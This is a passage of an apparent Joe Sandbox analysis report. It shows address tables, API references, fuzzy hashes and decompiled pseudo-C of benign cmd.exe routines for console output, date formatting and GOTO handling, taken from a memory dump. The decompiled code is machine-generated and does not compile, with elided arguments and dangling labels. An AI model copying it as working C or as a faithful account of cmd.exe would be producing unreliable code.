                                    0x011e49f1
                                    0x011e49f4
                                    0x011e49fb
                                    0x011e49fd
                                    0x011e4a06
                                    0x011e4a24
                                    0x011e4a2c
                                    0x011eea90
                                    0x00000000
                                    0x00000000
                                    0x011eea96
                                    0x011eea97
                                    0x00000000
                                    0x011eea97
                                    0x011e4a32
                                    0x011e4a38
                                    0x011e4a3e
                                    0x011ee9b0
                                    0x011ee9b0
                                    0x011e4a4b
                                    0x011e4a50
                                    0x011e4a55
                                    0x011ee9ba
                                    0x011ee9ba
                                    0x011e4a5b
                                    0x011e4a5e
                                    0x011e4a5e
                                    0x011e4a61
                                    0x011e4a64
                                    0x011e4a71
                                    0x011e4a7b
                                    0x011eea7b
                                    0x00000000
                                    0x00000000
                                    0x011eea81
                                    0x011eea82
                                    0x00000000
                                    0x011eea82
                                    0x011e4a87
                                    0x011e4a9d
                                    0x011e4a9d
                                    0x011e4aa2
                                    0x011ee9ef
                                    0x011ee9ef
                                    0x011e4aa8
                                    0x011e4aad
                                    0x011e4ab3
                                    0x011e4ab5
                                    0x011e4abd
                                    0x011e4b53
                                    0x011e4b53
                                    0x011e4ac3
                                    0x011e4ac8
                                    0x011e4acb
                                    0x011e4ad4
                                    0x011ee9fe
                                    0x011eea08
                                    0x011eea52
                                    0x011eea55
                                    0x00000000
                                    0x011eea55
                                    0x011eea0c
                                    0x011eea12
                                    0x011eea16
                                    0x00000000
                                    0x00000000
                                    0x011eea28
                                    0x011eea2e
                                    0x011eea33
                                    0x011eea38
                                    0x011eea3e
                                    0x011eea41
                                    0x011eea43
                                    0x011eea46
                                    0x00000000
                                    0x011e4ada
                                    0x011e4adc
                                    0x011e4ae1
                                    0x011e4ae7
                                    0x011e4aea
                                    0x011e4aed
                                    0x011e4aed
                                    0x011e4af0
                                    0x011e4af3
                                    0x011e4af9
                                    0x011e4aff
                                    0x011e4b00
                                    0x011e4b03
                                    0x011e4b09
                                    0x011e4b12
                                    0x00000000
                                    0x00000000
                                    0x011e48fc
                                    0x011e48fc
                                    0x011e48fe
                                    0x011e4900
                                    0x011e4906
                                    0x011e4909
                                    0x011e4909
                                    0x011e490c
                                    0x011e490f
                                    0x011e4918
                                    0x011e491a
                                    0x011e491f
                                    0x011e4927
                                    0x011e4937
                                    0x011e4941
                                    0x011e4944
                                    0x011e4946
                                    0x011e4955
                                    0x011e4957
                                    0x011e4957
                                    0x011e495c
                                    0x011e495e
                                    0x011e4964
                                    0x011e4969
                                    0x011e4972
                                    0x011e49bc
                                    0x011e49c4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e4974
                                    0x011e497b
                                    0x00000000
                                    0x00000000
                                    0x011e497d
                                    0x011e497e
                                    0x00000000
                                    0x011e497e
                                    0x011e4972
                                    0x011e4929
                                    0x011e4931
                                    0x011eea67
                                    0x00000000
                                    0x00000000
                                    0x011eea6d
                                    0x011eea6e
                                    0x00000000
                                    0x011eea6e
                                    0x00000000
                                    0x011e4931
                                    0x011e4ad4
                                    0x011e4a89
                                    0x011e4a8e
                                    0x011e4b1d
                                    0x011e4b22
                                    0x011e4b4b
                                    0x011e4b4b
                                    0x011e4b24
                                    0x011e4b27
                                    0x011e4b27
                                    0x011e4b2a
                                    0x011e4b2d
                                    0x011e4b3d
                                    0x011e4b40
                                    0x011ee9ca
                                    0x011ee9e5
                                    0x011ee9e5
                                    0x011ee9ca
                                    0x011e4b40
                                    0x00000000
                                    0x011e4a8e
                                    0x011e4a0f
                                    0x011ee967
                                    0x011ee96b
                                    0x011ee96d
                                    0x011ee96d
                                    0x011ee97c
                                    0x011ee99a
                                    0x00000000
                                    0x011ee97e
                                    0x011ee980
                                    0x011ee982
                                    0x011ee982
                                    0x011ee988
                                    0x011ee990
                                    0x00000000
                                    0x011ee990
                                    0x011ee97c
                                    0x011e4a15
                                    0x011e4a17
                                    0x011ee9a5
                                    0x011ee9a5
                                    0x011e4a1f
                                    0x00000000
                                    0x011e4a1f
                                    0x011e48d1
                                    0x011e48d9
                                    0x011e48db
                                    0x011e48dc
                                    0x011e48de
                                    0x011e48e1
                                    0x011e48e4
                                    0x011e48e7
                                    0x011e48ed
                                    0x011e48f6
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • memset.MSVCRT ref: 011E4861
                                    • memset.MSVCRT ref: 011E4881
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E4991
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E499E
                                    • longjmp.MSVCRT(0120B8B8,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 011EE94C
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$Heap$AllocProcesslongjmp
                                    • String ID:
                                    • API String ID: 2656838167-0
                                    • Opcode ID: 5fb23863ef84f287cb4b93a009a850ece2e652e6b9bdc2f115d537b9a9d913b2
                                    • Instruction ID: a60e01ff0d5a996e948a621ff15948cbf00e643bf52fd4290830f50435c43733
                                    • Opcode Fuzzy Hash: 5fb23863ef84f287cb4b93a009a850ece2e652e6b9bdc2f115d537b9a9d913b2
                                    • Instruction Fuzzy Hash: ACD10374900A158BDB3DCF98C8987A9FBF5AF84704F0840DDDA4AA7681EB706E81CB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DB6CB, Relevance: 9.2, APIs: 6, Instructions: 155COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 62%
                                    			E011DB6CB(void** __ecx, intOrPtr _a8) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				void** _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t96;
				void* _t97;
				void* _t103;
				intOrPtr _t114;
				void* _t115;
				void** _t121;
				void** _t122;
				void* _t125;
				void* _t126;
				void* _t135;
				void* _t136;
				signed short _t143;
				long _t153;
				short* _t155;
				void* _t161;
				signed int _t164;
				void* _t168;
				void _t170;
				void _t174;
				intOrPtr _t184;
				void* _t187;
				void* _t192;
				void** _t193;
				signed int _t195;
				signed int _t204;
				int _t207;
				void** _t215;
				void** _t216;
				signed int _t224;
				signed int _t228;
				void* _t229;
				void* _t232;
				void* _t238;
				void* _t240;
				intOrPtr _t248;
				signed int _t253;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t263;
				void* _t264;
				signed int _t265;
				void* _t266;

				_t193 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t97 = E011E269C(_t96);
					_t260 =  *(__ecx + 0x10);
					if(_t97 == 0) {
						if(E011E27C8( *(__ecx + 8) +  *(__ecx + 8), _t260,  *(__ecx + 8) +  *(__ecx + 8),  &_v20) == 0) {
							goto L59;
						} else {
							_t179 =  *(__ecx + 8);
							_t101 =  *(__ecx + 8) + _t179;
							if(_v20 >=  *(__ecx + 8) + _t179) {
								goto L35;
							} else {
								goto L59;
							}
						}
					} else {
						_t184 = _t260 +  *(__ecx + 8) * 2;
						_v12 = _t184;
						if(_t260 < _t184) {
							_t238 = 0x2022;
							while(1) {
								_t259 = _t260;
								if(_t260 >= _t184) {
									goto L35;
								}
								while( *_t259 != _t238) {
									_t259 = _t259 + 2;
									if(_t259 < _t184) {
										continue;
									}
									break;
								}
								if(_t259 == _t260) {
									goto L48;
								} else {
									_t192 = _t259 - _t260 >> 1;
									_v16 = _t192;
									__imp___get_osfhandle(0);
									if(WriteConsoleW(_t192, 1, _t260, _t192,  &_v8) == 0) {
										L59:
										_t202 = 1;
										if(E011E0178(_t101) == 0) {
											_t202 = 1;
											_t103 = E011F9953(_t102, 1);
											if(_t103 == 0) {
												_push(_t103);
												_push(0x70);
												goto L63;
											}
										} else {
											_push(0);
											_push(0x1d);
											L63:
											E011DC5A2(_t202);
											_pop(_t202);
										}
										E011F9287(_t202);
										__imp__longjmp(0x120b8b8, 1);
										asm("int3");
										_t204 = 9;
										memcpy( &_v420, _t260, _t204 << 2);
										_t266 = _t266 + 0xc;
										E011F3C49( &_v420,  &_v376);
										FileTimeToLocalFileTime( &_v376,  &_v384);
										FileTimeToSystemTime( &_v384,  &_v348);
										_v352 = 0;
										if( *0x1213cc9 == 0) {
											_t245 = _v348 & 0x0000ffff;
											_t261 = _v346 & 0x0000ffff;
											_t258 = _v342 & 0x0000ffff;
											_v352 = _t245;
											if(_v364 == 0) {
												_t224 = 0x64;
												_t245 = _t245 % _t224;
												_v352 = _t245;
											}
											_t114 =  *0x11fd540; // 0x0
											if(_t114 != 2) {
												if(_t114 == 1) {
													_t135 = _t261;
													_t261 = _t258;
													_t258 = _t135;
												}
											} else {
												_t136 = _t245;
												_t245 = _t258;
												_t258 = _t261;
												_v352 = _t245;
												_t261 = _t136;
											}
											_t207 =  *0x11fd598; // 0x0
											if(_t207 >= 0x20) {
												_t115 =  *0x11fd594; // 0x0
												goto L92;
											} else {
												_t115 = realloc( *0x11fd594, 0x40);
												_pop(0);
												if(_t115 != 0) {
													_t245 = _v352;
													_t207 = 0x20;
													 *0x11fd594 = _t115;
													 *0x11fd598 = _t207;
													L92:
													_push(_t245);
													_push(0x11ff80c);
													_push(_t258);
													_push(0x11ff80c);
													E011E274C(_t115, _t207, L"%02d%s%02d%s%02d", _t261);
													_t266 = _t266 + 0x20;
													_t258 = 2;
													goto L34;
												} else {
													_push(_t115);
													goto L79;
												}
											}
										} else {
											_v356 = 0;
											if(GetLocaleInfoW(E011E41A4(), 0x1f,  &_v332, 0x80) == 0) {
												_t245 = 0x80;
												E011E1040( &_v332, 0x80,  *0x11ff7f8);
											}
											_t143 = _v332;
											_t263 =  &_v332;
											_t258 = 2;
											if(_t143 != 0) {
												_t195 = _v356;
												_t228 = _t143 & 0x0000ffff;
												_t161 = 0x64;
												do {
													if(_t228 == 0x27) {
														_t263 = _t263 + _t258;
														_t195 = 0 | _t195 == 0x00000000;
													} else {
														if(_t195 != 0 || _t228 != _t161 && _t228 != 0x4d) {
															_t263 = _t263 + _t258;
														} else {
															_t253 = 0;
															do {
																_t263 = _t263 + _t258;
																_t253 = 1 + _t253;
															} while ( *_t263 == _t228);
															_v356 = _t263;
															_t264 = _t263 +  ~_t253 * 2;
															if(_t253 != 1) {
																_t168 = 0x64;
																if(_t228 == _t168) {
																	_v360 = 0;
																}
																if(_t253 <= 3) {
																	_t263 = _v356;
																} else {
																	_t245 = _v356;
																	_t229 = _t245;
																	_v356 = _t229 + 2;
																	do {
																		_t170 =  *_t229;
																		_t229 = _t229 + _t258;
																	} while (_t170 != _v352);
																	_t263 = _t264 + 6;
																	memmove(_t263, _t245, 2 + (_t229 - _v356 >> 1) * 2);
																	_t266 = _t266 + 0xc;
																}
															} else {
																_t232 = _t264;
																_t245 = _t232 + 2;
																do {
																	_t174 =  *_t232;
																	_t232 = _t232 + _t258;
																} while (_t174 != _v352);
																memmove(_t264 + 2, _t264, 2 + (_t232 - _t245 >> 1) * 2);
																_t266 = _t266 + 0xc;
																_t263 = _t264 + 4;
															}
														}
													}
													_t164 =  *_t263 & 0x0000ffff;
													_t228 = _t164;
													_t161 = 0x64;
												} while (_t164 != 0);
												_t193 = _v368;
											}
											if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332,  *0x11fd594,  *0x11fd598) == 0) {
												L31:
												_t261 = GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, 0, 0);
												if(_t261 == 0) {
													_t153 = GetLastError();
													_push(0);
													goto L77;
												} else {
													_t261 = _t261 + 1;
													_t155 = realloc( *0x11fd594, _t261 + _t261);
													_pop(0);
													if(_t155 == 0) {
														_push(0);
														L79:
														_push(8);
														goto L80;
													} else {
														 *0x11fd594 = _t155;
														 *0x11fd598 = _t261;
														_t261 = 0;
														if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, _t155, 0) == 0) {
															_t153 = GetLastError();
															_push(0);
															L77:
															 *0x1213cf0 = _t153;
															_push(_t153);
															L80:
															E011DC5A2(0);
															_t122 = 0;
														} else {
															L34:
															_t261 =  *0x11fd594; // 0x0
															goto L14;
														}
													}
												}
											} else {
												_t261 =  *0x11fd594; // 0x0
												if(_t261 == 0) {
													goto L31;
												} else {
													L14:
													_push(E011D5AA7(_v344 & 0x0000ffff));
													_t245 = 0x20;
													E011E1040( &_v76, _t245);
													if(_t193 == 0) {
														if(_v360 != 0) {
															if(E011D68B5() == 0) {
																_push(_t261);
																_push( &_v76);
															} else {
																_push( &_v76);
																_push(_t261);
															}
															_t121 = E011E25D9(L"%s %s ");
														} else {
															_push(_t261);
															_t121 = E011E25D9(L"%s ");
														}
														_t193 = _t121;
													} else {
														if(_v360 == 0 || _v364 != 1) {
															E011E1040(_t193, _a8, _t261);
														} else {
															_t126 = E011D68B5();
															_t248 = _a8;
															_t216 = _t193;
															if(_t126 != 0) {
																E011E1040(_t216, _t248, _t261);
																E011E18C0(_t193, _a8, " ");
																_push( &_v76);
															} else {
																E011E1040(_t216, _t248,  &_v76);
																E011E18C0(_t193, _a8, " ");
																_push(_t261);
															}
															E011E18C0(_t193, _a8);
														}
														_t215 =  &(_t193[0]);
														_t245 = 0;
														do {
															_t125 =  *_t193;
															_t193 = _t193 + _t258;
														} while (_t125 != 0);
														_t193 = _t193 - _t215 >> 1;
													}
													_t122 = _t193;
												}
											}
										}
										return E011E6FD0(_t122, _t193, _v8 ^ _t265, _t245, _t258, _t261);
									} else {
										_t101 = _v16;
										if(_v8 != _v16) {
											goto L59;
										} else {
											_t184 = _v12;
											_t260 = _t259;
											_t238 = 0x2022;
											L48:
											while(_t259 < _t184) {
												if( *_t259 == _t238) {
													_t259 = _t259 + 2;
													continue;
												}
												break;
											}
											if(_t259 == _t260) {
												L55:
												_t238 = 0x2022;
												if(_t260 < _t184) {
													continue;
												} else {
													goto L35;
												}
											} else {
												if( *_t193 != 0) {
													SetConsoleMode( *_t193, 2);
												}
												_t187 = _t259 - _t260 >> 1;
												_v16 = _t187;
												__imp___get_osfhandle(_t260, _t187,  &_v8, 0);
												_t240 = 1;
												_t260 = WriteConsoleW(_t187, ??, ??, ??, ??);
												_t101 = E011E06C0(_t240);
												if(_t260 == 0) {
													goto L59;
												} else {
													_t101 = _v16;
													if(_v8 != _v16) {
														goto L59;
													} else {
														_t184 = _v12;
														_t260 = _t259;
														goto L55;
													}
												}
											}
										}
									}
								}
								goto L102;
							}
						}
						goto L35;
					}
				} else {
					L35:
					_t193[1] = _t193[1] + E011DBED7(_t193, _t193[4]);
					 *(_t193[4]) = 0;
					_t193[2] = _t193[2] & 0;
					return 0;
				}
				L102:
			}



































































                                    0x011db6d4
                                    0x011db6dc
                                    0x011e9996
                                    0x011e999b
                                    0x011e99a0
                                    0x011e9a97
                                    0x00000000
                                    0x011e9a99
                                    0x011e9a99
                                    0x011e9a9c
                                    0x011e9aa1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e9aa1
                                    0x011e99a6
                                    0x011e99a9
                                    0x011e99ac
                                    0x011e99b1
                                    0x011e99b7
                                    0x011e99bc
                                    0x011e99bc
                                    0x011e99c0
                                    0x00000000
                                    0x00000000
                                    0x011e99c6
                                    0x011e99cb
                                    0x011e99d0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e99d0
                                    0x011e99d4
                                    0x00000000
                                    0x011e99d6
                                    0x011e99e0
                                    0x011e99e6
                                    0x011e99e9
                                    0x011e99f9
                                    0x011e9aa7
                                    0x011e9aa9
                                    0x011e9ab1
                                    0x011e9abb
                                    0x011e9abc
                                    0x011e9ac3
                                    0x011e9ac5
                                    0x011e9ac6
                                    0x00000000
                                    0x011e9ac6
                                    0x011e9ab3
                                    0x011e9ab3
                                    0x011e9ab5
                                    0x011e9ac8
                                    0x011e9ac8
                                    0x011e9ace
                                    0x011e9ace
                                    0x011e9acf
                                    0x011e9adb
                                    0x011e9ae1
                                    0x011e9ae4
                                    0x011e9aeb
                                    0x011e9aeb
                                    0x011e9af9
                                    0x011d5b59
                                    0x011d5b6d
                                    0x011d5b75
                                    0x011d5b81
                                    0x011e9bba
                                    0x011e9bc1
                                    0x011e9bc8
                                    0x011e9bcf
                                    0x011e9bdb
                                    0x011e9be3
                                    0x011e9be4
                                    0x011e9be6
                                    0x011e9be6
                                    0x011e9bec
                                    0x011e9bf4
                                    0x011e9c09
                                    0x011e9c0b
                                    0x011e9c0d
                                    0x011e9c0f
                                    0x011e9c0f
                                    0x011e9bf6
                                    0x011e9bf6
                                    0x011e9bf8
                                    0x011e9bfa
                                    0x011e9bfc
                                    0x011e9c02
                                    0x011e9c02
                                    0x011e9c11
                                    0x011e9c1a
                                    0x011e9c4c
                                    0x00000000
                                    0x011e9c1c
                                    0x011e9c24
                                    0x011e9c2b
                                    0x011e9c2e
                                    0x011e9c36
                                    0x011e9c3e
                                    0x011e9c3f
                                    0x011e9c44
                                    0x011e9c51
                                    0x011e9c51
                                    0x011e9c57
                                    0x011e9c58
                                    0x011e9c59
                                    0x011e9c62
                                    0x011e9c67
                                    0x011e9c6c
                                    0x00000000
                                    0x011e9c30
                                    0x011e9c30
                                    0x00000000
                                    0x011e9c30
                                    0x011e9c2e
                                    0x011d5b87
                                    0x011d5b87
                                    0x011d5baa
                                    0x011e9b09
                                    0x011e9b11
                                    0x011e9b11
                                    0x011d5bb0
                                    0x011d5bb7
                                    0x011d5bbf
                                    0x011d5bc3
                                    0x011d5bc5
                                    0x011d5bcd
                                    0x011d5bd0
                                    0x011d5bd1
                                    0x011d5bd5
                                    0x011e9b1d
                                    0x011e9b24
                                    0x011d5bdb
                                    0x011d5bdd
                                    0x011d5bf2
                                    0x011d5cdd
                                    0x011d5cdf
                                    0x011d5ce1
                                    0x011d5ce1
                                    0x011d5ce3
                                    0x011d5ce4
                                    0x011d5ceb
                                    0x011d5cf3
                                    0x011d5cf9
                                    0x011e9b2d
                                    0x011e9b31
                                    0x011e9b35
                                    0x011e9b35
                                    0x011e9b3e
                                    0x011e9b82
                                    0x011e9b40
                                    0x011e9b40
                                    0x011e9b46
                                    0x011e9b4b
                                    0x011e9b51
                                    0x011e9b51
                                    0x011e9b54
                                    0x011e9b56
                                    0x011e9b65
                                    0x011e9b74
                                    0x011e9b7a
                                    0x011e9b7a
                                    0x011d5cff
                                    0x011d5cff
                                    0x011d5d01
                                    0x011d5d04
                                    0x011d5d04
                                    0x011d5d07
                                    0x011d5d09
                                    0x011d5d23
                                    0x011d5d29
                                    0x011d5d2c
                                    0x011d5d2c
                                    0x011d5cf9
                                    0x011d5bdd
                                    0x011d5bf4
                                    0x011d5bf9
                                    0x011d5bfe
                                    0x011d5bfe
                                    0x011d5c01
                                    0x011d5c01
                                    0x011d5c32
                                    0x011d5d34
                                    0x011d5d53
                                    0x011d5d57
                                    0x011e9b8d
                                    0x011e9b95
                                    0x00000000
                                    0x011d5d5d
                                    0x011d5d5d
                                    0x011d5d68
                                    0x011d5d6f
                                    0x011d5d72
                                    0x011e9ba9
                                    0x011e9baa
                                    0x011e9baa
                                    0x00000000
                                    0x011d5d78
                                    0x011d5d7a
                                    0x011d5d8c
                                    0x011d5d93
                                    0x011d5da4
                                    0x011e9b98
                                    0x011e9b9e
                                    0x011e9b9f
                                    0x011e9b9f
                                    0x011e9ba4
                                    0x011e9bac
                                    0x011e9bac
                                    0x011e9bb3
                                    0x011d5daa
                                    0x011d5daa
                                    0x011d5daa
                                    0x00000000
                                    0x011d5daa
                                    0x011d5da4
                                    0x011d5d72
                                    0x011d5c38
                                    0x011d5c38
                                    0x011d5c40
                                    0x00000000
                                    0x011d5c46
                                    0x011d5c46
                                    0x011d5c52
                                    0x011d5c55
                                    0x011d5c59
                                    0x011d5c60
                                    0x011e9c79
                                    0x011e9c94
                                    0x011e9c9a
                                    0x011e9c9b
                                    0x011e9c96
                                    0x011e9c96
                                    0x011e9c97
                                    0x011e9c97
                                    0x011e9ca1
                                    0x011e9c7b
                                    0x011e9c7b
                                    0x011e9c81
                                    0x011e9c87
                                    0x011e9ca9
                                    0x011d5c66
                                    0x011d5c6d
                                    0x011e9cd4
                                    0x011d5c80
                                    0x011d5c80
                                    0x011d5c85
                                    0x011d5c88
                                    0x011d5c8c
                                    0x011e9cb1
                                    0x011e9cc0
                                    0x011e9cc8
                                    0x011d5c92
                                    0x011d5c96
                                    0x011d5ca5
                                    0x011d5caa
                                    0x011d5caa
                                    0x011d5cb0
                                    0x011d5cb0
                                    0x011d5cb5
                                    0x011d5cb8
                                    0x011d5cba
                                    0x011d5cba
                                    0x011d5cbd
                                    0x011d5cbf
                                    0x011d5cc6
                                    0x011d5cc6
                                    0x011d5cc8
                                    0x011d5cc8
                                    0x011d5c40
                                    0x011d5c32
                                    0x011d5cda
                                    0x011e99ff
                                    0x011e99ff
                                    0x011e9a05
                                    0x00000000
                                    0x011e9a0b
                                    0x011e9a0b
                                    0x011e9a0e
                                    0x011e9a10
                                    0x00000000
                                    0x011e9a1f
                                    0x011e9a1a
                                    0x011e9a1c
                                    0x00000000
                                    0x011e9a1c
                                    0x00000000
                                    0x011e9a1a
                                    0x011e9a25
                                    0x011e9a6f
                                    0x011e9a6f
                                    0x011e9a76
                                    0x00000000
                                    0x011e9a7c
                                    0x00000000
                                    0x011e9a7c
                                    0x011e9a27
                                    0x011e9a2a
                                    0x011e9a30
                                    0x011e9a30
                                    0x011e9a40
                                    0x011e9a46
                                    0x011e9a49
                                    0x011e9a4f
                                    0x011e9a57
                                    0x011e9a59
                                    0x011e9a60
                                    0x00000000
                                    0x011e9a62
                                    0x011e9a62
                                    0x011e9a68
                                    0x00000000
                                    0x011e9a6a
                                    0x011e9a6a
                                    0x011e9a6d
                                    0x00000000
                                    0x011e9a6d
                                    0x011e9a68
                                    0x011e9a60
                                    0x011e9a25
                                    0x011e9a05
                                    0x011e99f9
                                    0x00000000
                                    0x011e99d4
                                    0x011e99bc
                                    0x00000000
                                    0x011e99b1
                                    0x011db6e2
                                    0x011db6e2
                                    0x011db6ec
                                    0x011db6f6
                                    0x011db6f9
                                    0x011db702
                                    0x011db702
                                    0x00000000

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E99E9
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E99F1
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 011E9A30
                                    • _get_osfhandle.MSVCRT ref: 011E9A49
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9A51
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console$Write_get_osfhandle$Mode
                                    • String ID:
                                    • API String ID: 1066134489-0
                                    • Opcode ID: 5ff039ec64d9216b4eed72b3b2587159a5a2640a6f7a0d46ecb795624129ba88
                                    • Instruction ID: b2367d8543b8867467642ad135a330f00be212c9dff3c6b42c8ea4a752b78ace
                                    • Opcode Fuzzy Hash: 5ff039ec64d9216b4eed72b3b2587159a5a2640a6f7a0d46ecb795624129ba88
                                    • Instruction Fuzzy Hash: 4741C431B006199BDF2CDEB8D85DBAE77E9EF90308F05446AE906DB181EB74D940CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DE5A8, Relevance: 9.1, APIs: 6, Instructions: 115COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E011DE5A8(struct HINSTANCE__** __ebx, struct HINSTANCE__* __edx, intOrPtr __edi, void* __ebp, void* _a4, intOrPtr _a8, struct HINSTANCE__* _a12, struct HINSTANCE__* _a16, struct HINSTANCE__* _a20, struct HINSTANCE__* _a24, struct HINSTANCE__* _a28, void _a32, void* _a536, intOrPtr _a544, void* _a548, int _a552, char _a556, int _a560, signed int _a572) {
				void* _v0;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t59;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t64;
				struct HINSTANCE__ _t66;
				int _t69;
				int _t74;
				struct HINSTANCE__* _t76;
				struct HINSTANCE__* _t83;
				struct HINSTANCE__* _t84;
				void* _t85;
				struct HINSTANCE__* _t86;
				struct HINSTANCE__* _t87;
				struct HINSTANCE__* _t88;
				struct HINSTANCE__* _t100;
				struct HINSTANCE__** _t102;
				void* _t103;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__ _t114;
				intOrPtr _t132;
				struct HINSTANCE__* _t133;
				void* _t134;
				void* _t135;
				struct HINSTANCE__* _t136;
				struct HINSTANCE__* _t137;
				signed int _t140;
				void* _t142;

				_t132 = __edi;
				_t126 = __edx;
				_t102 = __ebx;
				goto L1;
				L33:
				__eflags =  *((short*)( *((intOrPtr*)(_t126 + 0x38)))) - 0x3a;
				if( *((short*)( *((intOrPtr*)(_t126 + 0x38)))) != 0x3a) {
					goto L4;
				}
				_t136 = E011E00B0(0x50);
				__eflags = _t136;
				if(_t136 == 0) {
					L73:
					_t57 = 1;
					L32:
					_pop(_t134);
					_pop(_t135);
					_pop(_t103);
					__eflags = _a572 ^ _t140;
					return E011E6FD0(_t57, _t103, _a572 ^ _t140, _t126, _t134, _t135);
				}
				_t136->i = 0;
				_t63 = E011DDF40(L"GOTO");
				 *(_t136 + 0x38) = _t63;
				__eflags = _t63;
				if(_t63 == 0) {
					goto L73;
				}
				_t64 = E011DDF40( *((intOrPtr*)(_a24 + 0x38)));
				 *(_t136 + 0x3c) = _t64;
				__eflags = _t64;
				if(_t64 == 0) {
					goto L73;
				}
				_t126 = 1;
				_t64->i = 0x20;
				 *(_t136 + 0x40) = 0;
				_a28 = 1;
				L13:
				if(_t132 != 0) {
					__eflags = _t136;
					if(_t136 != 0) {
						_a20 = 0;
					}
				}
				_t114 = _t136->i;
				if(_t114 != 0 ||  *( *(_t136 + 0x38)) != 0x3a) {
					if(_t126 != 0) {
						_a28 = 0;
						_t66 = _t114;
					} else {
						_t66 = _t114;
						if( *0x11fd0c8 == 1) {
							_t66 = _t114;
							__eflags = _t114 - 0x3b;
							if(_t114 != 0x3b) {
								__eflags =  *0x1218530;
								_t66 = _t114;
								if( *0x1218530 == 0) {
									E011F6FF0(_t114);
									_t126 = 0;
									E011F2ED0(_t136, 0);
									E011E25D9(L"\r\n");
									_t66 = _t136->i;
									_t140 = _t140 + 4;
								}
							}
						}
					}
					if(_t66 == 0x3b) {
						_t136 =  *(_t136 + 0x38);
					}
					_a552 = 0;
					_a556 = 1;
					_a560 = 0x104;
					memset( &_a32, 0, 0x104);
					_t140 = _t140 + 0xc;
					if(_a556 == 0) {
						_t69 = 0x104;
					} else {
						_t69 = 0x7fe7;
					}
					if(E011E0C70( &_a32, _t69) < 0) {
						E011E0DE8(_t70,  &_a32);
						goto L73;
					} else {
						if(_t136 == 0) {
							_t136 = 0;
							_a16 = 0;
							L28:
							__imp__??_V@YAXPAX@Z(_a552);
							_t140 = _t140 + 4;
							goto L29;
						}
						if( *_t136 != 0 || E011DDFC0(0x2a,  *(_t136 + 0x38),  &_a16) != 0xffffffff) {
							L25:
							_t126 = _t136;
							_a16 = E011E0E00(2, _t136);
							E011E06C0(2);
							_t74 = GetConsoleOutputCP();
							 *0x1203854 = _t74;
							GetCPInfo(_t74, 0x1203840);
							_t137 =  *0x11fd5f8; // 0x0
							if(_t137 == 0) {
								_t76 =  *0x11fd0d0; // 0xffffffff
								__eflags = _t76 - 0xffffffff;
								if(_t76 != 0xffffffff) {
									L67:
									__eflags = _t76;
									if(_t76 != 0) {
										_t137 = GetProcAddress(_t76, "SetThreadUILanguage");
										 *0x11fd5f8 = _t137;
									}
									L69:
									__eflags = _t137;
									if(_t137 != 0) {
										goto L26;
									}
									SetThreadLocale(0x409);
									L27:
									_t136 = _a12;
									goto L28;
								}
								_t76 = GetModuleHandleW(L"KERNEL32.DLL");
								_t137 =  *0x11fd5f8; // 0x0
								 *0x11fd0d0 = _t76;
								__eflags = _t76 - 0xffffffff;
								if(_t76 == 0xffffffff) {
									goto L69;
								}
								goto L67;
							}
							L26:
							 *0x12194b4(0);
